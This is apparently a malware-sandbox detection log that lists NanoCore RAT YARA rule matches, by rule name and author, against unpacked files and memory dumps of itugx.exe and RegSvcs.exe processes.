Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
